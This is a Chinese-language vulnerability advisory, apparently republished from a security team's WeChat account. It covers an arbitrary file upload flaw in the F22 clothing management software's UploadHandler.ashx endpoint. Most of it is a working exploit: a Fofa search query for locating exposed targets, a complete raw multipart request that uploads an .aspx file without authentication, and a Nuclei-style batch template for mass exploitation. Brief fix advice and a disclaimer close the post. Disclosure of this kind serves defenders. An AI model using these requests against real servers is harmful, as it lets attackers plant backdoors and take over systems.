@精英打工人们
漏洞描述
广州锦铭泰软件科技有限公司开发的F22服装管理软件系统/CuteSoft_Client/UploadHandler.ashx
接口存在任意文件上传漏洞,由于系统对用户上传的文件类型未作任何过滤和限制,未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。
@精英打工人们
漏洞复现
步骤一:使用以下语法进行资产搜索并确定要测试的目标...
# Fofa语法
body="F22WEB登陆"
步骤二:首页抓取数据包并修改如下进行放包测试....返回时间戳命名的aspx文件说明上传成功!!!
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host:IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
Content-Length: 409
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"
/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream
hello
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"
Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--
步骤三:将上传成功的文件进行路径拼接并在浏览器中访问,回显有内容则说明上传成功!
# 拼接路径
http://ip/upload/udplog/20231130123414718.aspx
@精英打工人们
批量脚本
id: F22-UploadHandler-fileupload
info:
name: F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞
author: xy
severity: critical
description: 'F22服装管理软件系统/CuteSoft_Client/UploadHandler.ashx接口存在任意文件上传漏洞,由于系统对用户上传的文件类型未作任何过滤和限制,未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。'
tags: 2023, F22, fileupload
metadata:
1 :
body="F22WEB登陆" :
verified: true
http:
raw:
|
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: {{Hostname}}
zh-CN,zh;q=0.9 :
multipart/form-data; boundary=----------{{randstr}} :
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 :
Accept: */*
gzip, deflate :
------------{{randstr}}
form-data; name="folder" :
/upload/udplog
------------{{randstr}}
form-data; name="Filedata"; filename="1.aspx" :
application/octet-stream :
{{randstr}}
------------{{randstr}}
form-data; name="Upload" :
Submit Query
------------{{randstr}}--
|
GET /upload/udplog/{{replace(file_name,'1,','')}} HTTP/1.1
Host: {{Hostname}}
extractors:
type: dsl
internal: true
name: file_name
dsl:
body
matchers:
type: dsl
dsl:
"status_code_1 == 200 && contains(body_1, 'aspx') && st
atus_code_2 == 200 && contains(body_2, '{{randstr}}')"
@精英打工人们
漏洞修复
* 配置访问控制策略:对路径 /CuteSoft_Client/UploadHandler.ashx 进行限制访问
* 联系厂商获取最新补丁信息:http://www.x2erp.com/
* 白名单检查文件扩展名
揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!
原文始发于微信公众号(揽月安全团队):F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论